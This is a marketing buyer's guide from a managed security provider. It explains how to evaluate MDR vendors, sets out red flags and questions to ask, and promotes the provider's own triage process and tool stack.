MDR BUYER'S GUIDE
How to Choose an MDR Provider. 5 Red Flags Most Vendors Hope You Miss.
Choosing the right managed detection and response provider is a high-stakes decision — one that determines whether your security team gets real threat intelligence or just more email to read. This guide covers what to evaluate, what to ask, and how to tell the difference between a real SOC and an alert forwarding service.
Verizon DBIR, 2025 [1]
WHY MDR EVALUATION MATTERS
Why Are So Many Organizations Choosing the Wrong MDR Provider?
The MDR market is projected to reach $10.43 billion by 2034, and over 62% of enterprises now use some form of managed detection service. But market growth doesn't mean quality. The barrier to calling yourself an "MDR provider" is effectively zero — and buyers who don't know what to evaluate are paying the price.
UNDERSTANDING THE DIFFERENCES
MDR vs SOC vs SIEM: What's the Difference and What Do You Actually Need?
The security industry uses three acronyms interchangeably — and that confusion is costing organizations millions. Here's what you're actually buying.
MDR (Managed Detection & Response)
A service that monitors your endpoints and network for threats, investigates alerts in real time, and responds to incidents — either immediately or under your direction. You don't own the people; you own the outcome. MDR works best when the provider has the authority and tools to respond without waiting for you to approve every action.
SOC (Security Operations Center)
A team (yours or outsourced) that monitors security events, triages alerts, and executes incident response. A SOC is the people; MDR is the service. You can have an in-house SOC or an outsourced SOC. Ridge IT's managed SOC is part of our MDR offering.
SIEM (Security Information & Event Management)
A tool (software) that ingests logs from across your environment and applies rules to detect patterns. A SIEM is just the platform. You still need people to watch it, tune it, and respond to what it finds. A SIEM without a SOC is an expensive log storage system.
What you actually need: An MDR provider with a capable SOC team backing real-time SIEM tooling. Not one of the three alone — all three working together.
5 RED FLAGS WHEN CHOOSING AN MDR PROVIDER
How to Choose an MDR Provider: What to Evaluate Before You Sign
If your "managed" security feels like it's still landing in your lap, it probably is. These are the five red flags that reveal whether an MDR provider is actually managing your detection and response — or just relabeling it.
They Only Triage Critical and High Alerts
Most MDR providers set a severity threshold. Anything below "high" gets logged, not investigated. But here's the problem: attackers don't announce themselves with high-severity alerts.
The alarm they trip could be the only one they trip — and they could have evaded all the others. A low-severity alert might be the single fingerprint of a sophisticated attack. Skipping it isn't efficiency. It's a gamble.
They Forward Alerts — They Don't Investigate Them
Here's the test: when you receive a notification from your MDR provider, has a full triage already been completed? Or are they sending you the alert with a label and expecting you to determine if it's real?
If you're still deciding what's a true positive and what's noise, you don't have managed detection and response. You have a human in the middle of your alert chain doing what an email rule could do.
They Can't Actually Respond — Only "Recommend"
If your MDR provider says "active remediation" but can't isolate an endpoint without your approval, that's guided response — not active response. Real response means the SOC can isolate machines, kill malicious processes, disable compromised accounts, and execute containment playbooks without waiting for you to wake up at 2 AM and click "approve."
When minutes matter, a recommendation email is not a response.
They Don't Check for Persistence
Stopping the initial threat isn't enough. A real triage checks whether the attacker left anything behind — scheduled tasks, registry entries, startup folder modifications, outbound PowerShell calls to GitHub or remote management tools. If your provider resolves the alert but doesn't check for persistence, the attacker just waits for the ticket to close and picks up where they left off.
They Lock You Into Their Platform
Many MDR providers require you to use their proprietary SIEM, their portal, their agent. When you leave, you lose your data, your dashboards, and sometimes your licenses.
A provider that needs to lock you in to keep your business is telling you something about the quality of their service. If they treated you the way your last vendor treated you, could you fire them without it hurting your business?
WHAT REAL MDR LOOKS LIKE
What Does Ridge IT's SOC Actually Do on Every Alert?
On every alert — not just criticals, not just highs, every alert — our SOC runs a full triage playbook. Our Tier 1 and Tier 2 analysts monitor and investigate every detection. If you get a notification from us, a full investigation was already completed. Here's what that means:
Persistence Checks
Scheduled tasks, registry entries, startup folders — did the attacker leave anything behind that will survive a reboot?
PowerShell & Script Analysis
Outbound PowerShell calls to GitHub, TeamViewer, or any external tool that says "I'm downloading something." We catch living-off-the-land techniques most providers miss.
C2 Communication Detection
Command-and-control indicators — is this endpoint phoning home to an attacker? We check for beaconing patterns, DNS anomalies, and encoded outbound traffic.
Identity Behavior Analysis
Impossible travel, credential stuffing patterns, lateral movement between systems. CrowdStrike Identity Protection catches account compromise before it becomes a breach. This is foundational to Zero Trust Architecture.
Immediate Isolation & Containment
If the alert is real, we don't send you an email asking for permission. We isolate the machine, kill the process, and disable the compromised account — then we call you with the full picture.
Full Forensic Documentation
Every triage produces a documented investigation trail — what was found, what was done, what to watch for next. Your compliance team and your auditors will thank you.
This is the difference between paying for somebody to watch an alert and paying for somebody to actually respond to it. Every client. Every alert. Every time.
THE COMPARISON
How Does a Typical MDR Provider Compare to Ridge IT?
We hear the same story from every prospect who comes to us after a disappointing MDR experience. Here's what they had versus what they get:
| Capability | Typical MDR Provider | Ridge IT Managed Security |
|---|---|---|
| Alert Triage Scope | ✗ Critical and high alerts only | ✓ Every alert — our standard triage process runs on every alert |
| Investigation Depth | ✗ Severity label + forwarded to your team | ✓ Persistence checks, PowerShell analysis, C2 detection completed before notification |
| Response Capability | ✗ "Guided response" — recommendations, not actions | ✓ Immediate isolation, process kill, account disable — no approval wait |
| Identity Monitoring | ✗ Endpoint-only visibility | ✓ CrowdStrike Identity Protection — lateral movement, impossible travel, credential attacks |
| Network Visibility | ✗ EDR data only — no network context | ✓ Zscaler ZIA inspects all outbound traffic for data exfiltration and C2 — part of a SASE architecture |
| License Ownership | ✗ Proprietary platform — lose data and access if you leave | ✓ You own every license. Full admin access. No black boxes. |
| Remote Access Security | ✗ Not typically included | ✓ Zscaler ZPA — Zero Trust remote access, significantly reduces lateral spread risk |
| Validation | ✗ "Trust us" — no proof of tool effectiveness | ✓ Cyber range tested — in our internal testing against 260 CISA threat samples, CrowdStrike took 3 months to bypass |
VENDOR EVALUATION
Managed Detection and Response Provider Comparison: Questions to Ask Every Vendor
Not all MDR providers are equal. The difference between a full-triage SOC and an alert-forwarding service isn't visible in a marketing deck — it emerges during incident response when minutes matter. Use these comparative questions to separate vendors who genuinely manage your detection from those who just relay messages.
Red Flags in Vendor Responses
- ○ "We triage critical and high-severity alerts"
- ○ "We forward alerts to your team for investigation"
- ○ "You'll need to approve remediation actions"
- ○ "Our platform is our differentiator"
- ○ "We can't give you admin access to your tools"
- ○ "You'll need to use our SIEM and agents"
Green Flags in Vendor Responses
- ✓ "We investigate every alert, regardless of severity"
- ✓ "Our SOC completes full triage before notifying you"
- ✓ "We isolate endpoints and kill processes immediately"
- ✓ "You keep full admin access to all your tools"
- ✓ "You own your licenses and your data"
- ✓ "We use industry-standard tools you already know"
MDR EVALUATION CHECKLIST
What Questions Should You Ask Before Choosing an MDR Provider?
Before you sign with any MDR provider — including Ridge IT — ask these ten questions. The answers will tell you whether you're getting managed detection and response or managed alert forwarding.
"What alerts do you investigate — all of them, or only criticals and highs?"
Attackers don't announce themselves with high-severity alerts. If your MDR skips low-severity detections, they're gambling that the one alert the attacker tripped was a loud one.
"When you notify me, has a full investigation already been completed — or are you forwarding the alert for me to investigate?"
The difference between MDR and an email rule. If you're still determining what's real, you have a filter, not a managed service.
"Can your SOC isolate endpoints, kill processes, and disable accounts without waiting for my approval?"
This is the difference between active response and guided response. At 2 AM, a recommendation email is not a response.
"What persistence checks do you run after stopping the initial threat?"
Scheduled tasks, registry entries, startup folder modifications, outbound calls to remote management tools. If they don't check for persistence, the attacker just waits for the ticket to close.
"What happens after hours — who's on the other end of a high-severity alert at 2 AM on a Saturday?"
Ask for specifics: named roles, escalation paths, response SLAs. "We have 24/7 coverage" means nothing without the process behind it.
"Who owns the tools and data if I leave?"
If your CrowdStrike tenant, your Zscaler, or your SIEM data lives on their proprietary platform, you don't own it — you're renting it. Leaving means starting over.
"What network and identity data do you see beyond the endpoint?"
Endpoint-only visibility is a known gap. Real MDR should include network traffic analysis and identity behavior monitoring — not just what happens on the machine.
"What is your median time to investigate and contain a confirmed threat?"
Not mean time to detect — that's a vanity metric. Ask for median time from alert to containment action. If they can't answer, they're not measuring it.
"How have you validated the tools you deploy — did you test them, or did the vendor tell you they work?"
Most providers deploy whatever their vendor partner recommends. Ask whether they've independently tested their stack against real-world threats.
"Can I see a sample investigation report from a real alert triage?"
A provider confident in their process will show you what a completed investigation looks like. One that can't is telling you something about what you'd actually receive.
Ridge IT's position: We answer every one of these questions publicly because our process is the product. Our standard triage runs persistence checks, PowerShell analysis, and C2 detection on every alert. You own every license. And we'll show you sample investigation reports before you sign. Ask us these questions directly →
WE TEST EVERYTHING WE DEPLOY
How Does Ridge IT Know Their Tools Actually Work?
Most providers deploy whatever their vendor partner tells them to. We test every leading security solution in our cyber range — throwing 260 reverse-engineered CISA threats at them and measuring what gets through. That's how we decided what to deploy, and it's why we're confident in what we recommend.
Methodology: Internal Ridge IT cyber range testing conducted across 2024–2025 using 260 reverse-engineered CISA threat samples tested against leading endpoint detection solutions under controlled conditions. Results may vary by environment and threat type.
What This Looks Like in Practice: The SonicWall Breach Wave
During the SonicWall breach wave, Ridge IT clients with CrowdStrike Identity Protection saw the attack unfold in real time: SonicWall compromised → a user starts Nmapping the network → CrowdStrike disables the user → another user is compromised → CrowdStrike disables that user.
Attack stopped. Clients without CrowdStrike Identity Protection got cryptolocked. Same attack, same vulnerability, different outcome — because the right tools were in place and someone was actually watching.
KNOW THE DIFFERENCE
What Is the Difference Between EDR, MDR, and XDR?
These three acronyms get used interchangeably, but they're fundamentally different. Understanding what you have — and what you actually need — is the first step to knowing whether your current provider is giving you what you're paying for.
A tool. Software that runs on your endpoints (laptops, servers, workstations) and detects suspicious activity. EDR is the sensor — it sees what happens on the machine. But it requires someone to watch the alerts, investigate them, and respond. If no one's doing that, you have a very expensive log generator.
A bigger tool. XDR extends detection beyond endpoints to include network traffic, cloud workloads, email, and identity systems. More visibility is better — but it's still a platform. It still needs humans to investigate alerts, correlate signals, and take action. More data without more analysis just means more noise.
A service. MDR is supposed to be the humans who run the tools — 24/7 monitoring, investigation, and response by trained security analysts. The problem is that "managed" has become a marketing label. Some MDR providers run a world-class SOC. Others just forward alerts. The acronym doesn't tell you which one you're getting.
The tool is important — which is why we deploy CrowdStrike Falcon, which in our internal testing took 3 months to bypass compared to other solutions. But the tool without the team is just noise. And the team without a real triage process is just an email forwarding chain.
FREQUENTLY ASKED QUESTIONS
Questions About MDR That Your Provider Hopes You Don't Ask
Ask them one question: "On a low-severity alert that fires at 2 AM on a Saturday, what exactly does your SOC do before notifying me?" If the answer involves the words "log," "queue," or "business hours," you have a filter, not an MDR. A real managed SOC runs persistence checks, PowerShell analysis, and C2 detection on every alert regardless of severity or time of day.
Guided response means the provider sends you a recommendation and waits for you to act. Active response means the SOC can isolate endpoints, kill processes, and disable accounts without waiting for your approval. When an attacker is moving laterally at 2 AM, the difference between these two models is the difference between containment and a full breach. Ridge IT operates with active response capability — we act first and brief you after.
You can — but we'll be honest about whether your current tool is the right one. We've tested every major endpoint solution in our cyber range. CrowdStrike took 3 months to bypass. Nothing else lasted more than 3 days. If you have an MDM, migration is an MSI — uninstall one, deploy the other. We walk your team through it end-to-end, or we handle it entirely. And if CrowdStrike isn't the right fit for some locations, we can still help with network and identity. It doesn't have to be all or nothing.
Most MDR providers only see endpoint data. We layer CrowdStrike Identity Protection on top of endpoint detection, which monitors every authentication event for anomalies — impossible travel, credential stuffing, lateral movement between systems. During the SonicWall breach wave, this is exactly what caught the attack: compromised user starts Nmapping the network, CrowdStrike disables the user, another account is compromised, CrowdStrike disables that one too. Attack stopped. Learn more about our Zero Trust architecture.
A 24/7 in-house SOC requires a minimum of 6–8 security analysts to cover all shifts. At $100K–$150K per analyst, you're looking at $600K–$1.2M annually — before tools, training, and turnover. Ridge IT delivers managed SOC coverage with full triage on every alert at a fraction of that cost. And we sell Microsoft 365 at 10% below list price, so the savings often offset a significant portion of the security investment.
Yes. Always. Your CrowdStrike tenant, your Zscaler, your Microsoft — they're yours from day one and they stay yours if you leave. We manage on MSP-specific tenants, and you always have full admin access. No black boxes. No hostage licenses. If we're not earning your business every month, you should be able to walk without losing your security infrastructure. That's how it should work. See our managed IT approach.
We're not endpoint-only. Zscaler ZIA gives us visibility into all outbound traffic — we see data exfiltration attempts, C2 communications, and DNS anomalies that endpoint-only providers miss entirely. CrowdStrike Identity Protection monitors authentication behavior across your environment. And Zscaler ZPA replaces VPN with Zero Trust access, eliminating the lateral spread risk that makes breaches catastrophic. The security stack works together — that's the point.
Three things. First, we triage every alert — most providers skip anything below high severity. Second, we don't just do endpoint — we manage the full stack: CrowdStrike for endpoints, Zscaler for network and remote access, Okta for identity, Microsoft 365 for collaboration. Third, you own everything. Arctic Wolf requires their proprietary platform. Huntress is agent-first with limited scope. We deploy industry-leading tools on your tenants and manage them end-to-end. We're the Inc. 5000 #1 ranked MSSP protecting 700+ organizations across healthcare, manufacturing, hospitality, and financial services.
RELATED SERVICES
The Full Security Stack Behind Real MDR
Managed Cybersecurity
Full triage on every alert — the Ridge IT managed security operation from the inside.
Find out howEndpoint Protection
CrowdStrike Falcon — cyber range tested. In our internal testing, 3 months to bypass vs. other solutions. Deployed and managed end-to-end.
Find out howZero Trust Architecture
Identity-verified access that significantly reduces lateral movement risk — the architecture that stops breaches before they spread.
Find out howSASE Security
Zscaler ZIA for internet security, ZPA for remote access — outbound visibility most MDR providers don't have.
Find out howPenetration Testing
External and internal testing that proves your defenses work — not just checks a compliance box.
Find out howSecurity Assessment
Find out what's actually exposed before an attacker does. Documented findings your team can act on.
Find out howSources & Methodology
- Verizon Data Breach Investigations Report (DBIR) 2025: Human element involvement in 60% of breaches; 87% of compromises executed in minutes or less; 20% of breaches take months or more to discover
- Fortune Business Insights 2025: 62% of enterprises use some form of managed detection service; MDR market projected to reach $10.43 billion by 2034
- Ridge IT Cyber Range Testing (2024-2025): 260 reverse-engineered CISA threats tested against leading endpoint detection solutions; CrowdStrike Falcon benchmark results
- Ridge IT Managed Security Data: SonicWall breach response case study (2023); SOC triage methodology; identity-based attack detection practices
READY FOR MDR THAT ACTUALLY RESPONDS?
Stop Paying for an Email Forwarding Chain
Get a security assessment from the Inc. 5000 #1 ranked MSSP — 700+ organizations, full triage on every alert, and you always own your licenses.
Get an MDR Gap ReviewNot sure your MDR provider is doing what they promised?
Get an MDR Gap Review